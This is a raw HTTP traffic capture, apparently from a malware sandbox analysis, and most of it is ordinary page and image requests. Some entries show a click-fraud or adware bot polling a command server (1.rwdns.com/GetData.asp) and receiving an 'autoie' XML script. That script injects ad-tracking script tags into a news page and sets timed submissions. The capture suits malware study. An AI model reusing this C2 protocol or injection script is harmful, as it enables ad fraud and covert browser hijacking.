Referer: hXXp://VVV.baidu.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&ch=&tn=baidu&bar=&wd=Ã„ÃÂ¾Â©Â»ÂªÃ‘Ã¯ÃŒÂ«Ã‘Ã´Ã„ÃœÃŽÂ¬ÃÃž&rn=&rsv_pq=d2904f7a0001a2af&rsv_t=42818soSHCj6OJ1V+D3jINfqWBpwgbzcx03vVt65ADB0W8InvHUTnZY4ek0&rsv_enter=1&inputT=29860

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: t12.baidu.com

Connection: Keep-Alive

Cookie: H_PS_PSSID=11077_1427_13074_12825_13381_12867_13322_12692_13411_10562_12723_12735_13438_13086_13453_13325_13201_12835_13491_13162_8498; BAIDUID=6483934B3F9915C4C4DEE385E7300A12:FG=1; BIDUPSID=6483934B3F9915C4C4DEE385E7300A12


HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Content-Type: image/jpeg

Expires: Sun, 17 May 2015 00:10:55 GMT

Cache-Control: max-age=2628000

Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT

ETag: 819f875798157471454771e60fd4acbf

Content-Length: 1556

Date: Thu, 16 Apr 2015 14:10:55 GMT

Server: lighttpd
......JFIF.............C..............................................
!........."$".$.......C...............................................
........................K.K.."........................................
2..........................!1a.AQ.R."2q.b............*........................AQ..!1q#3a.C.R..............?....N.
..%..h..H.u..)i>.K"m..).9L.A.....B..(.u....EcH.q"0 UY.]=....R...3..
[email protected]._X.8..u.g6...ff^A..O[ ..
......x.0d./[rQ...m]?Ag6^/xn.....I.n:p..|..$#..^E<|`k....WM7..$mxHH
."dx...xbm.Jt..i.\@....A.E?..JV.{...l...*....f.........LgI...Vy._p.B].
....d.Q.G U. X..1\.M98lT...n.$m._ks.TVi..x..........d....4..'..o......
7 ...!n?4...=./....$m..5..F...gTkH~y..6.v.@?./....q....En. Lr..S.4.p..
.5)...a..u...........e...X.hG..V..>.r........[.........^V....?(..~.
.U..T...xe X.......h.Q.N=....9*..lm.`..... ^ KZS.y....*E....e...[.*..'
...'.t..J...M.^.1I[.l2Y..'.y..5.}...|l;..@./U*.......JSN.u*)u...B.H..#
h.K.."^]!..>..b..b.....-s.c1Sw...esSsj.W&...t.. 2.x....z.|#.1[....{
...4...V..`"....M.\MJ.....I.S..j.x..jd.:I.iYt6....}.......~...........
...p.Dg).Ff....%S,...nW(R.*.M..F...jR].v.J.m!)H........8O.......GeUS.C
O.Sq...!D....!t.....P.t.z.0W2.?.&.....d.Q.9...1.=...TxJS.7nX8}.G.u...m
.S2M3Tz.....T\..h/;.Q..........."..jH...K.MvH.M.|.......k.O.=...[p...T
C...^`...bB......`fq.....,.{r.j.Yd.E.......r.a.>.....e....8.J.q:...
._..&.Z1.W.L9p.o.V....1$.]..A.t2.......(Q.........."#x......p.......".
i).Z..._........4.$.....F...&2........j...vdw.V...ol"7`w..Q.."{BI.<<< skipped >>>

GET /ps_default.gif?_t=1429193428632 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: i8.baidu.com

Connection: Keep-Alive

Cookie: BAIDUID=8C833062B6F97482CA56473B4B36B66F:FG=1; BIDUPSID=8C833062B6F97482CA56473B4B36B66F; H_PS_PSSID=13495_11077_1468_13464_13074_13382_12867_13322_12691_13411_10562_12722_12737_13439_13085_13325_13202_12835_13491_13162_8498


HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Content-Type: image/gif

ETag: "1721284351"

Accept-Ranges: bytes

Last-Modified: Mon, 28 Jul 2014 10:27:30 GMT

Content-Length: 43

Date: Thu, 16 Apr 2015 14:10:26 GMT

Server: lighttpd

GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Access-Con
trol-Allow-Origin: *..Content-Type: image/gif..ETag: "1721284351"..Acc
ept-Ranges: bytes..Last-Modified: Mon, 28 Jul 2014 10:27:30 GMT..Conte
nt-Length: 43..Date: Thu, 16 Apr 2015 14:10:26 GMT..Server: lighttpd..
GIF89a.............!.......,...........D..;..

GET /it/u=3488912159,3986088090&fm=58 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&ch=&tn=baidu&bar=&wd=Ã„ÃÂ¾Â©Â»ÂªÃ‘Ã¯ÃŒÂ«Ã‘Ã´Ã„ÃœÃŽÂ¬ÃÃž&rn=&rsv_pq=d2904f7a0001a2af&rsv_t=42818soSHCj6OJ1V+D3jINfqWBpwgbzcx03vVt65ADB0W8InvHUTnZY4ek0&rsv_enter=1&inputT=29860

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: t12.baidu.com

Connection: Keep-Alive

Cookie: H_PS_PSSID=11077_1427_13074_12825_13381_12867_13322_12692_13411_10562_12723_12735_13438_13086_13453_13325_13201_12835_13491_13162_8498; BAIDUID=6483934B3F9915C4C4DEE385E7300A12:FG=1; BIDUPSID=6483934B3F9915C4C4DEE385E7300A12


HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Content-Type: image/jpeg

Expires: Sun, 17 May 2015 00:10:55 GMT

Cache-Control: max-age=2628000

Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT

ETag: c1f96404bc7eb15018ded7ec078b8ef6

Content-Length: 1927

Date: Thu, 16 Apr 2015 14:10:55 GMT

Server: lighttpd
......JFIF.............C..............................................
!........."$".$.......C...............................................
........................K.K.."........................................
3..........................!1A...Qaq."B...2Rr.........................
...........(.......................!1.A"2Q....................?....(.E
z....L.l..>k.b4v.....H.k.......V..@........ ..1.` ..n)Rd5..|.......
.G5.........R..Ti%KG........;.. ..^pL..fG.0..Cm....Ze.Tg8.....T.!C...n
.94.....9..s...I...\..^}.N.......H....2..Q!...n..>...}..1,..D'..F..
..G.N.w.W.Fjf...3 .p1RF.|.N.....rm.f....w..WT.|.....\....,..Y.<...L
..MM~J}?.R....a .....(...Rm..[: .......J.......n.....(;..VpV. .)#.U...
...O....Hoc.8.P.8............v.)].......Ck.\.2..-...JV.`...=..S..q..-.
.......K..@[N$.....j....v5e.p.X..Q.J.J..Gq.).D.....=5.oM`..Y......y. .
..<.D.Ge....r..J.....!..>h.cnMV..;k487...#.$...)........./..... 
.P7.J6....FWU[q.'.,g..z{...Nx......(.ix.|..#..(}.R<[..Q."4..2..-..A
C....=~a.t._.c.w...4.^v..e....ps....&.0....1.......?.d.T9Gr...8v.....n
..V..%...X....zr*.U1...0,..5..M..6.]Er.6Q...p....y .b.V4...FM....Q.$%.
.J.H.3......-..l....nC...D.Y..X.8.J...{.%jZ..l[..K3. .......*...h....s
.mS a.i<..g.....=.K`....Q..?.\.|&..y%......;..V....u..(R.....$6.~K.
....g..s..........nQI*......O.....).i..o....zL..X..p......JW.-#..Ec...
...t..L..i.J.\.. [email protected].....#.8..Xi.m..x..(..m^jU....{..A.8..5...[]..
....\.........1.O..7......b.iJ.....gZ...[.x.g.v..P.........G..... ..q.
...j6...c...i....I.^...".<..Z...Y}......R.P9'.zSU..x6..M.....z`<<< skipped >>>

GET /it/u=4267047014,3229650163&fm=58 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&ch=&tn=baidu&bar=&wd=Ã„ÃÂ¾Â©Â»ÂªÃ‘Ã¯ÃŒÂ«Ã‘Ã´Ã„ÃœÃŽÂ¬ÃÃž&rn=&rsv_pq=d2904f7a0001a2af&rsv_t=42818soSHCj6OJ1V+D3jINfqWBpwgbzcx03vVt65ADB0W8InvHUTnZY4ek0&rsv_enter=1&inputT=29860

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: t12.baidu.com

Connection: Keep-Alive

Cookie: H_PS_PSSID=11077_1427_13074_12825_13381_12867_13322_12692_13411_10562_12723_12735_13438_13086_13453_13325_13201_12835_13491_13162_8498; BAIDUID=6483934B3F9915C4C4DEE385E7300A12:FG=1; BIDUPSID=6483934B3F9915C4C4DEE385E7300A12


HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Content-Type: image/jpeg

Expires: Sun, 17 May 2015 00:10:56 GMT

Cache-Control: max-age=2628000

Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT

ETag: 10af7b2bac04b9fb6db7d3be74e2aac7

Content-Length: 3143

Date: Thu, 16 Apr 2015 14:10:56 GMT

Server: lighttpd
......JFIF.....H.H.....C..............................................
!........."$".$.......C...............................................
........................K.K...........................................
8...........................!1."AQa....2..Tq..#B..$RU.................
..................4........................!1..A.."Qaq.2R..#S....3B...
...........?..o.).k....K.e.Yq.\QR........I:.....n.J.....&M5J..........
[email protected]<.<....D5..:.&...J.Z....S.X.f?
........ .X.N.:hiq.....z..K>.}......s.S.O.Pw.....H..%..NGu.m|5. ...
...Jn$).V: ..#H J...-....%8...0.: ...&W.E"(B(B(B(B...).u vOz!.......n.
)i[%.e..I l.Z......X.... #.............}N...................J%i)......
nI.. N..-<..]W.i...zB......O>.dJ..T.r...5q......._[.........$.w.
..."s.U....I#_or.x..L[?..p".....b4..z).g..vd.....z.....n...6..<@...
..;...Z..5n.l.ym.L.*....6.I......za.....!.HjC.......(.......< ..!..
..omJ.s. ...GLVQB.B.B.V..M;.[.v.&.....[.7(.6T.Xk...#.Z.JQ.% .,u.......
........I;......E'k^...\>c.&}....v.....CC.........<.wg&.w.......
,s.i6.M.H..9o$...=..I.z..........$6.{cr....n.c.:.{.......9..eVS...O...
7......"d.....J.Ol..V.F..b.n.N,.#.C(BH\d..2.Ns.p.*...u....s_.\7..a..9.
3..7.J..R>%....e..d.d4.'..kR..5.T..GU.X..l.n:..}.n.F.J.......!^J.4A
H...d..XAmadd$...K...&V.* .2....$%.-..E4..n.u..z....c.....e...........
.SS..fZaP....n.....U./Sj..........[.....m6.m.PPA....sZ....$........f.|
.k.q....Qm5....Fk{|..vRl.x......}...(.eG.yt..P....{H.t..N.............
@...*[..`j....>...k.7..yCWq...>O.NY..{...S.07......,..\.....<<< skipped >>>

GET /commonpage/0709/d_07.png HTTP/1.1

Accept: */*

Referer: hXXp://fashion.ifeng.com/a/20150405/40098172_1.shtml

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; 360SE)

Host: y1.ifengimg.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:35 GMT

Server: PWS/8.1.20.9

X-Px: ms h0-s1056.v0-mow ( h0-s1134.v0-mow), ht h0-s1134.v0-mow.cdngp.net

Cache-Control: max-age=31536000

Expires: Tue, 12 Jan 2016 00:25:56 GMT

Age: 8171079

Content-Length: 1482

Content-Type: image/png

Last-Modified: Wed, 09 Jul 2014 10:08:51 GMT

Connection: keep-alive
.PNG........IHDR...(.........C.le....tEXtSoftware.Adobe ImageReadyq.e&
lt;... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CS5 Windows" xmpMM:InstanceID="xmp.iid:858F0949DFF511E39A2E92234F
E687DE" xmpMM:DocumentID="xmp.did:858F094ADFF511E39A2E92234FE687DE">
; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:858F0947DFF511E39A2E
92234FE687DE" stRef:documentID="xmp.did:858F0948DFF511E39A2E92234FE687
DE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> 
<?xpacket end="r"?>[email protected]. ..H../.Zg..'..>v.f..$.
ad....H....D.......IH.k.o!E..;.wz....."...% ..bQ..!T`mjsA^.r.x.......9
...x......i1......s...c.../.\Z"..[...>....`(.gW.R...........~.....c
.-.}D..g....\..b.9.m.=S5..O...b..re.......1.^!f..[.....Xs.f..n...rge..
.dd}=w.......g.h......o...Z..Z..s........x...C......7.!Nb.u....uI.....
............o..R.t3.{.9.)..].D.(I..G.....0.k..H..).v....n..$iI..z.\f(.
.^...Ax...,Gj..f}.._.Z85...!.2.n.e{......~P.`...M.!W#....76.c....4.M..
).ekl.P&...7.u.3......%-ql....$.....t...~....K.....s..0/.W.)={....X.5.
e......2...s..).v.....K=f......tj...|...3|..../....?....^:.A......<<< skipped >>>

GET /hdt-cookie/ck?n=force_preview&v=FT1504130011-4493-CT150407010&t=-1&turl=http://adm.icast.cn/nortb/hdt-ifocus/request/?id=PM1304281078&be_retarg=RE141201001 HTTP/1.1

Accept: */*

Referer: hXXp://fashion.ifeng.com/a/20150405/40098172_1.shtml

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; 360SE)

Host: map.icast.cn

Connection: Keep-Alive


HTTP/1.1 302 Found

Server: Apache-Coyote/1.1

P3P: CP=CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR

Set-Cookie: force_preview=FT1504130011-4493-CT150407010; Domain=icast.cn; Path=/

Location: hXXp://adm.icast.cn/nortb/hdt-ifocus/request/?id=PM1304281078&be_retarg=RE141201001

Content-Length: 0

Date: Thu, 16 Apr 2015 14:10:39 GMT

Connection: close

POST /GetData.asp HTTP/1.1

Referer: hXXp://VVV.baidu.com/s

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; WindowsNT5.0; SV1; Maxthon)

Content-Type: application/x-www-form-urlencoded;

Host: 1.rwdns.com

Content-Length: 47

Cache-Control: no-cache

SN=ClientSetOnlineV6&SP='YSVC082501-2991731197'
HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 13:58:04 GMT

Server: Microsoft-IIS/6.0

Content-Length: 3

Content-Type: text/html; Charset=GB2312

Set-Cookie: ASPSESSIONIDAAARDQRC=DNBBGAEDALNLNGOAEMKOHIFJ; path=/

Cache-control: private

120HTTP/1.1 200 OK..Date: Thu, 16 Apr 2015 13:58:04 GMT..Server: Micro
soft-IIS/6.0..Content-Length: 3..Content-Type: text/html; Charset=GB23
12..Set-Cookie: ASPSESSIONIDAAARDQRC=DNBBGAEDALNLNGOAEMKOHIFJ; path=/.
.Cache-control: private..120....

POST /GetData.asp HTTP/1.1

Referer: hXXp://VVV.baidu.com/s

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; WindowsNT5.0; SV1; Maxthon)

Content-Type: application/x-www-form-urlencoded;

Host: 1.rwdns.com

Content-Length: 28

Cache-Control: no-cache

Cookie: ASPSESSIONIDCCCTAQQC=NIMLPLLDLNEFDIBOKBANKDIM; ASPSESSIONIDAAARDQRC=DNBBGAEDALNLNGOAEMKOHIFJ

SN=ClientGetV6ZiRanKey&SP=IE
HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 13:58:05 GMT

Server: Microsoft-IIS/6.0

Content-Length: 98

Content-Type: text/html; Charset=GB2312

Cache-control: private
577655[*]..................[*]VVV.yanghua37.com/[*]False[*]0[*]1[*]5[*
]False[*]False[*]True[*]TrueHTTP/1.1 200 OK..Date: Thu, 16 Apr 2015 13
:58:05 GMT..Server: Microsoft-IIS/6.0..Content-Length: 98..Content-Typ
e: text/html; Charset=GB2312..Cache-control: private..577655[*].......
...........[*]VVV.yanghua37.com/[*]False[*]0[*]1[*]5[*]False[*]False[*
]True[*]True..

GET /a/20150405/40098172_1.shtml HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; 360SE)

Host: fashion.ifeng.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:28 GMT

Server: PWS/8.1.20.9

Transfer-Encoding: chunked

X-Px: ms h0-s1129.v0-mow ( h0-s1018.v0-mow), ms h0-s1018.v0-mow ( h0-s96.p13-pek), rf-ms h0-s96.p13-pek ( origin)

Cache-Control: max-age=600

Expires: Thu, 16 Apr 2015 14:14:12 GMT

Age: 377

Content-Type: text/html

Content-Encoding: gzip

Vary: Accept-Encoding

Last-Modified: Thu, 16 Apr 2015 14:02:57 GMT

Connection: keep-alive
3103..............iw.I.0..9..C.....-.6.J6./.Xmvh...S.*-F.Z.......f16.b
.....l..cc.....U..O..nd-R.T..L.3.j..J....................X ..m..Y..9..
.b...X.5...I.}...^..b.....O..v[*...6.....H..!q.....d9.8.=...."=z'.^...
f....8.^|...Jcg.G-.?...G..$./H.......*@C...,..........a|4..#......,...
. &.x0..F#....Ei..<5.y...Ow........{i..??].~.#=].o....KS...........
....e..*...|w6.r....s.................|fL:.;...^g..J W.Q..U...^\......
.\. =~ ../..^DFyv$3.N..8......FN.....j...c..{x. g...2..Qh...Q. 6(z..1.
@..8.(*..Gcb<9.TI.C...d2..p..D...........;8...N.......,."=xK..Z%...
..mU.....x...=...I..I........).|..l..(.2<.....0f.%...4..0..K.g.P.'.
Vy....>.. .$..]..'.7.z.n.g..Hqv..(;.s1.. .'.k....2:..$BA..<...-[
~..G.........h<i(7....vA....]....#.d....<..........p*lz...?J%...
...#.....v.D*8.n.G...h..G.....0.lG3.....].z.0[.O.[....d.s..h..{..',n2T
..i^;.C.vm.._.......q.....1.\Bt..K..aG...f'Z.-D..eK...e.C..u..R...t.|z
....QXM.Z............p....g.......F......"....aO..E#.?b../.......bH...
x...J..........%.........6.\[email protected]._......F........
9..|.*..........6....._Lz...vhG.......!....A/.......-.....~lU..Bm..).w
D|.C...n@..@.(..*.t.....P......j,4.^...&............k.OD#....<....d
<%..k.N....?..L.x`.D....b".J6af..(..R...o.T...(..nA8...E..A1..6m*.t
...>..g......X )D..`B............ .h...d...4........./p{......1..e.
b.Po.A,.....M-\[email protected]@~.5...........2.?m....>W..0S........
p=.....pG.}?Z1....."6/[email protected]..[...q.x......
~m...d.f.Qb`.........i.f...... ...x...@?...K....~... z.FY ..A.....<<< skipped >>>

GET /web/reg/icast_125_1.asp HTTP/1.1

User-Agent: AutoIE???

Host: VVV.it885.com.cn


HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 977

Content-Type: text/html

Server: Microsoft-IIS/7.5

Set-Cookie: ASPSESSIONIDSARCDQTQ=HNGJJLFDAAEKEEHGBNLOPKOH; path=/

X-Powered-By: ASP.NET

Date: Thu, 16 Apr 2015 14:10:47 GMT
..<?xml version="1.0" encoding="GB2312" ?><autoie>..<wh
ile>..<clearwindow>0</clearwindow>..<browser>Mozi
lla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.
0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; 360SE)</browser>
..<url>hXXp://fashion.ifeng.com/a/20150405/40098172_1.shtml</
url>..<htmlcontent><![CDATA[ <script type="text/ja
vascript" defer>document.write('opt<scr' 'ipt src=\"hXXp://map.i
cast.cn/hdt-cookie/ck?n=preViewCookie_35&v=bye&t=0\"></scr' 'ipt
><scr' 'ipt>b=\"hXXp://map.icast.cn/hdt-cookie/ck?n=force_pre
view&v=FT1504130011-4493-CT150407010&t=-1&turl=\";c=\"hXXp://adm.icast
.cn/nortb/hdt-ifocus/request/?id=PM1304281078&be_retarg=RE141201001\";
document.write(\"<scr' 'ipt src=\\\"\" (b escape(c)) \"\\\"><
\\/scr' 'ipt>\");</scr' 'ipt>');</script>]]></htm
lcontent>..<sleepopen>20</sleepopen>..<sleepfill>
5</sleepfill>..<sleepSubmit>5</sleepSubmit>..<hre
f cmd="submit" value="#" type="find" place="0">hXXp://</href>
..</while>..</autoie>HTTP/1.1 200 OK..Cache-Control: priva
te..Content-Length: 977..Content-Type: text/html..Server: Microsoft-II
S/7.5..Set-Cookie: ASPSESSIONIDSARCDQTQ=HNGJJLFDAAEKEEHGBNLOPKOH; path
=/..X-Powered-By: ASP.NET..Date: Thu, 16 Apr 2015 14:10:47 GMT....<
?xml version="1.0" encoding="GB2312" ?><autoie>..<while>
;..<clearwindow>0</clearwindow>..<browser>Mozill<<< skipped >>>

GET / HTTP/1.1

User-Agent: Mozilla/4.0 (compatible)

Host: VVV.ip138.com


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 06:57:15 GMT

Content-Length: 16585

Content-Type: text/html

Content-Location: hXXp://VVV.ip138.com/index.htm

Last-Modified: Thu, 16 Apr 2015 04:00:16 GMT

Accept-Ranges: bytes

ETag: "76f8c4d8f977d01:ae6a"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Age: 25981

X-Via: 1.1 kf48:10 (Cdn Cache Server V2.0)

Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..
<html>..<head>..<meta http-equiv="Content-Type" content
="text/html; charset=gb2312">..<meta name="mobile-agent"content=
"format=html5; url=hXXp://m.ip138.com/">..<title>IP........--
.................. | ............ | ............ | ...................
.....</title>..<meta name="Keywords" content="ip,IP....,IP...
.....,ip138">..<meta name="Description" content="ip,IP....,IP...
.....,ip138">..<script language="javascript">..<!--..if(wi
ndow.top!=window.self)window.top.location.href='hXXp://VVV.ip138.com/'
;..function checkIP()..{...var ipArray,ip,j;...ip = document.ipform.ip
.value;...if (ip.indexOf(" ")>=0){....ip = ip.replace(/ /g,"");....
document.ipform.ip.value = ip;...}...if (ip.toLowerCase().indexOf("htt
p://")==0){....ip = ip.slice(7);....document.ipform.ip.value = ip;...}
...if (ip.toLowerCase().indexOf("hXXps://")==0){....ip = ip.slice(8);.
...document.ipform.ip.value = ip;...}...if (ip.slice(ip.length-1)=="/"
){....ip = ip.slice(0,ip.length-1);....document.ipform.ip.value = ip;.
..}...if(/[A-Za-z_-]/.test(ip)){....if(!/^([\w-] \.) ((top)|(com)|(net
)|(org)|(gov\.cn)|(info)|(cc)|(com\.cn)|(net\.cn)|(org\.cn)|(name)|(bi
z)|(tv)|(cn)|(mobi)|(name)|(sh)|(ac)|(io)|(tw)|(com\.tw)|(hk)|(com\.hk
)|(ws)|(travel)|(us)|(tm)|(la)|(me\.uk)|(org\.uk)|(ltd\.uk)|(plc\.uk)|
(in)|(eu)|(it)|(jp)|(co)|(me)|(mx)|(ca)|(ag)|(com\.co)|(net\.co)|(nom\
.co)|(com\.ag)|(net\.ag)|(fr)|(org\.ag)|(am)|(asia)|(at)|(be)|(bz)<<< skipped >>>

GET /stat.php?id=4690803&web_id=4690803 HTTP/1.1

Accept: */*

Referer: hXXp://1.rwdns.com/zztj/yeshe.html

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s6.cnzz.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Tengine

Content-Type: application/javascript

Transfer-Encoding: chunked

Connection: keep-alive

Date: Thu, 16 Apr 2015 14:10:17 GMT

Last-Modified: Thu, 16 Apr 2015 14:10:17 GMT

Cache-Control: max-age=5400,s-maxage=5400

Via: cache47.l2de1[730,200-0,M], cache21.l2de1[731,0], cache8.de1[731,200-0,M], cache5.de1[733,0]

X-Cache: MISS TCP_REFRESH_MISS dirn:7:235191043

X-Swift-SaveTime: Thu, 16 Apr 2015 14:10:17 GMT

X-Swift-CacheTime: 5400
29d..(function(){function k(){this.c="4690803";this.R="z";this.N="";th
is.K="";this.M="";this.r="1429193417";this.P="oz.cnzz.com";this.L="";t
his.u="CNZZDATA" this.c;this.t="_CNZZDbridge_" this.c;this.F="_cnzz_CV
" this.c;this.G="CZ_UUID" this.c;this.v="0";this.A={};this.a={};this.l
a()}function g(a,b){try{var c=.[];c.push("siteid=4690803");c.push("nam
e=" f(a.name));c.push("msg=" f(a.message));c.push("r=" f(h.referrer));
c.push("page=" f(e.location.href));c.push("agent=" f(e.navigator.userA
gent));c.push("ex=" f(b));c.push("rnd=" Math.floor(2147483648*Math.ran
dom()));(new Image).src="hXXp://jserr.cnzz.com/log.php?" c.join("&")}c
atch(d){}}var h=document,e=window,f=encodeUR..24b8..IComponent,l=decod
eURIComponent,n=unescape,p=escape;k.prototype={la:function(){try{this.
U(),this.J(),this.ia(),this.H(),this.o(),.this.ga(),this.fa(),this.ja(
),this.j(),this.ea(),this.ha(),this.ka(),this.ca(),this.aa(),this.da()
,this.qa(),e[this.t]=e[this.t]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i
 failed")}},oa:function(){try{var a=this;e._czc={push:function(){retur
n a.B.apply(a,arguments)}}}catch(b){g(b,"oP failed")}},aa:function(){t
ry{var a=e._czc;if("[object Array]"==={}.toString.call(a))for(var b=0;
b<a.length;b  ){var c=a[b];switch(c[0]){case "_setAccount":e._cz_ac
count="[object String]"==={}.toString.call(c[1])?c[1]:String(c[1]);.br
eak;case "_setAutoPageview":"boolean"===typeof c[1]&&(e._cz_autoPagevi
ew=c[1])}}}catch(d){g(d,"cS failed")}},qa:function(){try{if("undefined
"===typeof e._cz_account||e._cz_account===this.c){e._cz_account=th<<< skipped >>>

GET /safeframe/1-0-2/html/container.html HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://fashion.ifeng.com/a/20150405/40098172_1.shtml

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; 360SE)

Host: tpc.googlesyndication.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/html

Last-Modified: Fri, 16 Jan 2015 15:36:52 GMT

Date: Wed, 08 Apr 2015 05:54:39 GMT

Expires: Thu, 07 Apr 2016 05:54:39 GMT

X-Content-Type-Options: nosniff

Server: sffe

Content-Length: 1877

X-XSS-Protection: 1; mode=block

Cache-Control: public, max-age=31536000

Age: 720958

Alternate-Protocol: 80:quic,p=0.5
......n....W{s....?..0.........X.....i...h.v;.dC....Wc..=..Wr.wwv.u.&l
t;..yR.=.l.|.jj..D.;......F}..."..;l..;.t..F........%..B..&.<..{J!.
.o.$.G..p.R...e.K....7-.._...<bD...0....'1s.i......3G.X..D.....L3G2
.x8.......8.D...?M(.<".pd.dI...%b>dIO.N.Cz..`...q1......x$h.I.#.
..s&.<..|..m.Ke$..\G.a$.ZC..D..D..<...G..|)....v..~2...Vx..m.)8J
j.....e.^.#Y..."0.}....!.....n:......!.b~:j.a.........g.t..n.`O../...V
^...I.Z.*"..,.1-..c.qv.Ib]JA.l. ....R.;U...<.k......}..U.....L...&l
t;..o...3..ni.|ze.M]..._.k.]....~.J..z.Z............$.S.p..AV.1.X...G}
..I..S@b...>h<M.....!......\e.K..K....b.M......-~.C....p.:m....x
[email protected].... .)s.B!.v..t..q........1...O<.?..".u...'>.N.
....9}.... .{h..%...-DZV.k...t..<.!a...*uD.%6.t......n...^8..>JN
.E..<..Op..u.......=s.B..Q.U.6v...%.o....y(...].V!...>*....{8.|.
N......Y5 .0.......?.....`c..]..\Rvz.GY......c....-....C79_.9..5.3..Vh
^....`......8.T.@|%.....t.OrU<RJ.Y.9.".u:..\X.x.....G._q.?Q......}.
.k.Q..kF....n0.m...v..l.......I.%.L.R0.....i,.$..26..."Q...sK..X..|...
>.|SRq:.Bh...q....k.M.....V..G.O.x.C.,.Ho.Z.F2.R9r.Z.z.uR_b.J`.?p^9
...e.rDv...#.".NR..G....m.x.9".......H.Xo....Q...'..S"...b...JFm...y..
.r....$......-.}..)K~O......j..q....xF*nS.n.g......aJ'L;..(.lhBy.....|
..;..0....c.......ws.8-..Jq........K......D[.C..P..........8...0N,..a.
_).X.g..q....s..=..T;..M..l.B....Z[.o.\...c..z....a.-..{ ...S1f.t....y
.nv...T.........>8I.|.Sb.......:...{C..._.Nq..H....Z8-...MT.F...X.&
lt;.jM.........Tuj.$.4..2..HPM$...Na...^.1....e9....*Z.8=...}.Y..?<<< skipped >>>

GET /it/u=2394089844,1505224976&fm=58 HTTP/1.1

Accept: */*

